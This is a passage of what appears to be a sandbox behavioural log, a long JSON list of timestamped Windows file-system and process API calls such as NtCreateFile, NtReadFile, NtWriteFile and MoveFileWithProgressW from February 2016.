"timestamp": "2016-02-16 17:42:00,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,469", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:42:00,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:00,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:00,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:00,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:00,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,760", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,770", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,790", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,790", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,790", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,830", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:00,830", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,840", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": 